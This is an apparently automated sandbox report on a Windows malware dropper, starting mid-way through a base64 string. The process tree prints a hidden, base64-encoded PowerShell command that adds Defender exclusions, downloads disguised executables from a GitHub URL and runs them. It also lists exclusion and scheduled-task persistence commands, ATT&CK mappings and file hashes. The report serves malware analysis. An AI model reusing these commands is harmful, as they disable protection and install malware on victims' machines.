EEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFYAdwBCAGgAQQBHAGsAQQBkAEEAQQBLAEEASAAwAEEAIgA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3260
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcATwBXADYANAAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwAnACIACgAKACQAdQByAGwAMQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8ARABpAHMAYwBvAHIAZAAuAGUAeABlACcACgAkAHUAcgBsADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEEAbQBqAGEAZABCAGEAbABsAHMALwBUAEUAUwBUAC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEcAbwBvAGcAbABlAEMAaAByAG8AbQBlAC4AZQB4AGUAJwAKACQAdQByAGwAMwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAKACQAdQByAGwANAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcACgAKACQAbABvAGMAYQB0AGkAbwBuAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABEAGkAcwBjAG8AcgBkAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABHAG8AbwBnAGwAZQBDAGgAcgBvAG0AZQAuAGUAeABlACcALAAKACAAIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzAFwAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAKACkACgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMABdAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAbABvAGMAYQB0AGkAbwBuAHMAWwAxAF0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAzACAALQBPAHUAdABGAGkAbABlACAAJABsAG8AYwBhAHQAaQBvAG4AcwBbADIAXQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMwBdAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGwAbwBjAGEAdABpAG8AbgAgAGkAbgAgACQAbABvAGMAYQB0AGkAbwBuAHMAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAbABvAGMAYQB0AGkAbwBuACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAKAH0A
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6040
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5168
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5020
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4144
      - C:\Users\Public\Downloads\Discord.exe
        
        "C:\Users\Public\Downloads\Discord.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5884
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5532

C:\ProgramData\Discord
"C:\ProgramData\Discord"
1⤵
- Executes dropped EXE
PID:4320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
713ad359b75fe6d947468ec1825202b9

SHA1
19dcd19f18a2ad6deb581451aad724bd44a592a4

SHA256
56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

SHA512
4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7aea85a5d58b45db7a4d9dd361b1eb5d

SHA1
c6844a476f9b8396b0db499d50303a0f34b8ddc6

SHA256
1b33dfb5c90ef3794804742054d7fb9fcaf94b99dfabd14054df4cd81794c46e

SHA512
f83d365e93c894d00c926c09d383b5805551a7c96595278131c3f5d44259713e5bb47a1d4259e452743a5c5040e8502c4e979a8ca076a4ea53d32722fb2b9057

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ed90a660c04943bc07a5a29de51d4690

SHA1
4c1aabb06ed20c50300c6fddc492f4c1d491a09c

SHA256
70a4394643ed5adc0b953feb18f2318ea59a6aa6daab3161c5ffbe476891af02

SHA512
d78542e322265eca647cd0d41ff33383b0aebadcaf6cfe021433dd0581d9605d5a1924524529607564a8eaa0bed940a8cce73d2450182aa67856385f435aea95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
181B

MD5
b7c15308d582666aad00433800636623

SHA1
746de1be1f7d0a57073bfc8555d1a50c0ceb8481

SHA256
2ef8ed1741d6e991e025e5fed5d2a4157bf475e338f088d17b558751556afa40

SHA512
4fea2b1f5b6db06a75ddb61e90709e1db61efe0a20836acf42a656f3d622223a9961b363a88b31289f03b6494aab7c690e8845aa8f94b9819c344e850e4d591d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe59388b.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
85266487334912cdbeed786e9b12dc7d

SHA1
bc5f04455d6362e3cab8d11687561d07d6dd5aa6

SHA256
ef837ce07e76ff30ab0b80b42fd36b937857359354df992926b65b7a4a5a0587

SHA512
471ec15690f18f33f5364be0f5fef416ce5e79eb94987c35fc5b94af7520916b50f7fc1910f82925ca63ce84e8f941327670eab580c593e2e99170553d48395f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
5a1228ac5b7c4ae08d0eccd1d99cac61

SHA1
8929b67f8807fadc94306d0308b0b5da281aece5

SHA256
1fca479ba0d47bb9246e67137e94fc375c5f8054cb80eb412727076166b5acdd

SHA512
ad7d3435941aab44f7fe672a236f018ec21ad3da8ab3b1a70f86f244c3295c533a2d8a928684b6cb30a2ddb54413e0aafa1368b1acb125b56db1fb914976a4cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c214405a1ca465a32a96d085ab4de139

SHA1
8df1be44e098d46cd406e3a57274ea7c8bee020e

SHA256
2565994aff0f0a0ed208da12b3ce0b0bde7a0deb2dacd72d7de2119931d4b88e

SHA512
cd0974ff0641b7422aaff842cdcf173d6463f18ced67302338e3d299c031919e6b3efa6c332797785f7ae83b3e6a68c4d7a2215d533eb441db9319ee9811fc34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
3197bce0fd2473291af7f959cb82b58f

SHA1
5747e270e0cb151ade7d29a1510ede74fc1e1a46

SHA256
b05c79dd0ad7e33bdb5e71f2fea8aee06d415a97ce2e9da76cbfed9f7b6f2c4f

SHA512
43e22facecb57e8a61671f4c6f76baf28f574291e46fda2d00fa00e6fc46800693947c2bb700976f983272f3c0f35f5ecce3f45ad4385ac9161a09460b2aa8ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
55ac5035daa44e5169d4454fa40900cb

SHA1
a78cc59c2726ea59b71980fe2b80f4293af088e4

SHA256
7f8b0f40d1a6a8010e8d365f6d92c1dbdafcaeabf1ee492d745864ce78f4f3ac

SHA512
cfd5bac258a40a11f38346e74c8a43f18617c3742a83c51be6fd2caeec71c43c56a0684454b22b4adbb7caf7b3dc93cd7e0aaa5d4d7e7c528eda840374626c6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
bca4dfbbf712975e4679b02fdc4d35d8

SHA1
f9f12f237ae8597f227f6ad2ebbad7e1e05d6b35

SHA256
498db54d32af70e3645e499e1df81abbd5ee003c4791a72ae57c1754258397d8

SHA512
d4fd4ff80c6de28d56225d768e5b33f5611124372048a17351cd959cdd860b3911d49a3b235971f649fdd7ff1a3caab83c56013e376ec1f5c63faa48d0fd60de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
91c7142641892d9ebd7682b31c336b75

SHA1
05cdb58f14dc2bbe2b8bb2d3158a6cee9e7bfb9f

SHA256
e7e8a4def273d0e298b8aac873652004bebb98a7e424f5896d85819068e894c5

SHA512
56335db470bd4b44a316170323adbfc76523d62d6cd3d70e6211d22c12fc48e3e6171b7f97bf369272d3c9953b1e622dc908fa9d745db209ac712d7ca4914fa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
820b1ea0ac6e2e68c17734619a284042

SHA1
766bbc68e81458f130b1ff0b7905fa5e665e455e

SHA256
108677259743f72f8bb9dedeed2e94c78d3ebebec816c1dfa8848e5818527f5e

SHA512
4b2368ad62f6e2d301ef12a9b1db88ae887e536a5aa49d6555fafbc8f81747c29e3435673feefa99ef1b5950ba29aba2aa4fcf9de43c881fcca3aba752bdbb19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
14ade977d5aee19d8d43a5545fb17aa4

SHA1
2f09f41411cd31ea761e878ef477a0a15f037823

SHA256
313690a5bea10becc948a438d4197abe7d6116e1f36cc094bfe63ac4b76bc704

SHA512
f7bf8a2e6a5fe5e4c60873e8e053227f7fdeb46a7336d95ae08b3aefa3e46c4310ac5185903f9854172604b1f1cdfffa7a9aeeea11464adebe6d999f46f999c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
837527a59a15e7093381def74355d392

SHA1
c21545e057875294ef2929598bdc0e55e2d8c97c

SHA256
6285f5fc2856463f25d8f3e30b7d592fa8a83a8878d72f3d095897816b95cb75

SHA512
5f1a09f4310cd7009cc9cf23ac4806b9638974d669c49c5c98a7174e95d847f2e5fbc4400a041315cb264db9170a788d2e1e917f80163e919b6e2440e5c3e4e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1b0c91fd0646bc16568e0af0a7b38ca4

SHA1
3bacea479bcc5d943e280f5e69348934b2e7bf3f

SHA256
b0adfca1b1dffe5d7cb9aebbab47b906ecd71c95ca25b9aa39f7347e6342aa68

SHA512
0828c4d2803c94919fd757c1a07ef624933616952b31b2064819160b803b3ca67e8ca6dcb95672251bc8662276f537389e5a12ced297169b18aa173fa572f5b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
53a622e6b9aac84790849999bfdc0c3a

SHA1
81dd472e61c4028b4d980f19a531b6b369dfab34

SHA256
cec7cb5d726c0ad7ab91883bc94e1a62f3d5b1fe570b4b181010b0d6d9203824

SHA512
c10c3a07ad6616a617187075f1a6ab6bdfd2bdd3904b8a6b74de0d0d3ae6ac5a46cb4200d20d39b56ca688c2e2734c2549cdfebe1af60edc970c13df28dad6a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6f7eb405e2879fb008dc3a533e6357d3

SHA1
0d99c40ebc8cc86ca4bda593097837a92dc06f57

SHA256
b08ac14c18515a078ceeb317fffbb7be08c0d5825dde712eb9ad285194b203d2

SHA512
470f3547656ba63513a8cc4ec7e4a5cc765312e394fc7759ca0eadf244ffd23c5491fa39669f2f5d82845a6884936caba6420e4480375af0daf678bad21c9e32

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsgvfvg3.zlx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
a799002f0e59a4149337748cd8eb7eb4

SHA1
bb7c04d26e6fe2e080165b31ecc175eddd2e9293

SHA256
245f2bd98abc93e1a21b76db9e343a787498845b7a92c21241dd22cd8a0ccde3

SHA512
7b5625bd5be1358a2f723ab386670f5076986b6912b6cfa69af825c25445061c943f9cb93840bb84be2d03eb77378f81aaec000abdd969bcb33d434afb2913c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
2f4774a98f366f9ab6143fd356bb50fa

SHA1
7066e1c3424b27ee5159477bd7267bd8830599fb

SHA256
0219566d0699d73f8911ec408f4f1f61e44973406ec83ddd4f74da47c3b83c5a

SHA512
cfee83ca5262ec5ba68d0365456982ee2af74807158a06e82d182c6c9a701445c113740d4d76472479f3d83e87ee5b3f53a01e7ed48a81c2a123574b2fafe352

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
f9113e506fb832f6a5d16b8181532bfc

SHA1
811dd35e25d2a0783bfc461ace3a6adc822436bd

SHA256
2a8513d3990e63581608cc8c320873f063b3c6f980596c36b2b9ee0da8d1605a

SHA512
6557bbbd3ea3fc4d8902e42e0c0837c234a9fdd01b4bf11863bbdbee8571d19957fa6e3344263c16b37037a1481fa9840d7de02e34e653b1bb8bd02d8d66043e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
4d5e712da8f7f3c72d4a4cf1225f0255

SHA1
102bbeb0518f1c27489706220894ed83cd1c9212

SHA256
4ffb8d157aee2e9115689e48d570efeac760c0f56eeae9670a32145971706de0

SHA512
5c6b74c4dec8bf6ebbbbe1f791867c782218eb1b36173ad1264fdaa1d06bc5e4e1ed126944f945b77bf358f4a1ababc15c47b95b3de2012d86a09c99d7269e62

Download Submit
C:\Users\Public\Downloads\Discord.exe

Filesize
66KB

MD5
879e4ad359e88bc384ee197e68728b50

SHA1
f7547bfe974d52fe71c5e8f5e8195732f1736509

SHA256
0cfc81ec769e4cb977cd2fadc68a766a2a80f80691c0b8f8517f468b8cf4fdfe

SHA512
23cc1aa66bf4158310258bcfa806c89085ec43a0f476d4e46d6da8c4f91a38b8b653a7a50c736592894d29301f95ef76866c3d920f1aeb2d51248bbeaa144e97

Download Submit
memory/1368-14-0x00007FF8366E0000-0x00007FF8371A2000-memory.dmp

Filesize
10.8MB

Download
memory/1368-13-0x00007FF8366E0000-0x00007FF8371A2000-memory.dmp

Filesize
10.8MB

Download
memory/1368-15-0x00007FF8366E0000-0x00007FF8371A2000-memory.dmp

Filesize
10.8MB

Download
memory/1368-12-0x000002404EF40000-0x000002404EF62000-memory.dmp

Filesize
136KB

Download
memory/1368-2-0x00007FF8366E3000-0x00007FF8366E5000-memory.dmp

Filesize
8KB

Download
memory/1368-18-0x00007FF8366E0000-0x00007FF8371A2000-memory.dmp

Filesize
10.8MB

Download
memory/2300-36-0x00000291C5D60000-0x00000291C5F22000-memory.dmp

Filesize
1.8MB

Download
memory/5572-288-0x00000000003D0000-0x00000000003E6000-memory.dmp

Filesize
88KB

Download